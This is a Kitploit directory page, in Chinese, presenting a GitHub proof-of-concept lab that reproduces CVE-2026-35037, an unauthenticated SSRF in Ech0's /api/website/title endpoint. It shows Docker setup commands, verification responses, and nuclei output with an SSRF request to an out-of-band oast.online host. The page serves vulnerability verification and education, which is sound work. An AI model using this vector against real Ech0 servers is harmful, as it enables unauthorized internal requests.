Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC_CVE-2026-35037 — 用于CVE-2026-35037的本地隔离复现实验室,这是Ech0的GET /api/website/title端点中的一个未认证SSRF漏洞。包括Docker Compose设置、验证脚本和用于验证的nuclei模板。 | Kitploit
工具/GitHubGitHub/fineman999/poc_cve-2026-35037
漏洞分析漏洞利用Web安全渗透测试学习与教育实验室与实践
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

用于CVE-2026-35037的本地隔离复现实验室,这是Ech0的GET /api/website/title端点中的一个未认证SSRF漏洞。包括Docker Compose设置、验证脚本和用于验证的nuclei模板。

查看仓库
23个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-35037 Ech0 SSRF 实验环境

此仓库包含一个本地隔离的复现实验室,用于演示 Ech0 的 GET /api/website/title 端点中的未认证 SSRF 漏洞 CVE-2026-35037。

该实验室使用受控的本地证据服务器,而非云元数据或第三方基础设施。

概述

  • 产品:lin-snow/Ech0
  • 漏洞:服务器端请求伪造
  • CVE:CVE-2026-35037
  • GHSA:GHSA-cqgf-f4x7-g6wc
  • 受影响版本:GHSA 列出 <= 4.2.1;NVD 描述早于 4.2.8 的版本
  • 修复版本:4.2.8
  • 端点:GET /api/website/title
  • 参数:website_url
  • 身份验证:在受影响版本中不需要

参考资料:

  • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
  • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

文件

  • docker-compose.yml:启动 Ech0 和本地证据 HTTP 服务器
  • Dockerfile.ech0-lab:从官方 GitHub 标签构建 Ech0
  • verify-cve-2026-35037.sh:发送受控的 SSRF 验证请求
  • evidence/index.html:包含唯一 <title> 的受控 HTML 页面
  • nuclei/CVE-2026-35037.yaml:nuclei 模板候选

为何从源码构建?

创建此实验室时,历史受影响 Docker 标签(如 sn0wl1n/ech0:4.2.1)不可用。实验室改为从官方 lin-snow/Ech0 GitHub 标签构建:

  • v4.2.1 用于受影响版本候选
  • v4.2.8 用于修复版本的比较

本地 Dockerfile 还避免了从历史 build.Dockerfile 观察到的上游构建问题。

要求

  • Docker Engine 或 Docker Desktop
  • curl
  • 可选:nuclei

请仅在本地隔离实验室中运行。不要针对第三方系统使用这些命令。仅对你拥有或获得明确书面授权测试的系统使用。

复现受影响行为

启动 Ech0 v4.2.1:

root@kitploit:~
ECH0_TAG=4.2.1 docker compose up -d --build

发送受控验证请求:

root@kitploit:~
sh verify-cve-2026-35037.sh

预期受影响响应:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}

确认 Ech0 到达了受控证据服务器:

root@kitploit:~
docker compose logs evidence

观察到的证据日志:

root@kitploit:~
ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -

比较修复版本

启动 Ech0 v4.2.8:

root@kitploit:~
docker compose down -v
ECH0_TAG=4.2.8 docker compose up -d --build

运行相同请求:

root@kitploit:~
sh verify-cve-2026-35037.sh

观察到的修复版本响应:

root@kitploit:~
HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8

{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}

Nuclei 验证

验证模板:

root@kitploit:~
nuclei -validate -t nuclei/CVE-2026-35037.yaml

针对受影响版本 v4.2.1 运行:

root@kitploit:~
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

观察到的受影响结果:

root@kitploit:~
[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.

针对修复版本 v4.2.8 运行:

root@kitploit:~
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

观察到的修复版本结果:

root@kitploit:~
[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.

清理

root@kitploit:~
docker compose down -v

备注

  • 手动实验室使用 Docker Compose 网络内的 http://evidence:8080/。
  • Nuclei 模板使用 {{interactsh-url}} 并需要 OAST/interactsh 支持。
  • Nuclei 模板使用 {{interactsh-url}},默认会连接 ProjectDiscovery 的 interactsh 服务器,例如 oast.online 或 oast.fun。可使用 -iserver 覆盖服务器或 -ni 禁用 interactsh。
  • 实验室不会探测云元数据端点。
  • 实验室不会联系生产环境或第三方目标,除了 Docker 构建过程中的正常依赖/镜像下载。
下载工具